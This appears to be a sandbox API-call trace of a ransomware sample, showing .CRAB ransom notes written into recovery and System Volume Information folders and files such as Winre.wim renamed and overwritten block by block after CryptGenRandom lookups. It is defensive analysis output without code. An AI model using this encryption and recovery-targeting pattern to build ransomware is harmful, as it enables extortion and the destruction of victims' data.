File Create filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Get Info filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\boot.sdi, type = file_attributes True 1
Fn
File Move source_filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\boot.sdi, destination_filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\boot.sdi.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\boot.sdi.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\boot.sdi.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\boot.sdi.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\boot.sdi.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\boot.sdi.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\boot.sdi.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\boot.sdi.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\boot.sdi.CRAB, size = 1048576, size_out = 24576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\boot.sdi.CRAB, size = 24576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\boot.sdi.CRAB, size = 256 True 2
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\boot.sdi.CRAB, size = 8 True 1
Fn
Data
File Get Info filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim, type = file_attributes True 1
Fn
File Move source_filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim, destination_filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 393234 True 1
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 393248 True 1
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 256 True 2
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 8 True 1
File Create filename = C:\System Volume Information\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
File Write filename = C:\System Volume Information\\CRAB-DECRYPT.txt, size = 3278 True 1
File Create filename = C:\System Volume Information\SPP\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
File Write filename = C:\System Volume Information\SPP\\CRAB-DECRYPT.txt, size = 3278 True 1
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\\CRAB-DECRYPT.txt, size = 3278 True 1
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1464a7e2-b1f6-44f6-ab25-0a7a4bb4c5ec}_OnDiskSnapshotProp, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1464a7e2-b1f6-44f6-ab25-0a7a4bb4c5ec}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1464a7e2-b1f6-44f6-ab25-0a7a4bb4c5ec}_OnDiskSnapshotProp.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1464a7e2-b1f6-44f6-ab25-0a7a4bb4c5ec}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1464a7e2-b1f6-44f6-ab25-0a7a4bb4c5ec}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 2376 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1464a7e2-b1f6-44f6-ab25-0a7a4bb4c5ec}_OnDiskSnapshotProp.CRAB, size = 2384 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1464a7e2-b1f6-44f6-ab25-0a7a4bb4c5ec}_OnDiskSnapshotProp.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1464a7e2-b1f6-44f6-ab25-0a7a4bb4c5ec}_OnDiskSnapshotProp.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{17603fef-a99c-46eb-a49a-b5f7a388ac37}_OnDiskSnapshotProp, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{17603fef-a99c-46eb-a49a-b5f7a388ac37}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{17603fef-a99c-46eb-a49a-b5f7a388ac37}_OnDiskSnapshotProp.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
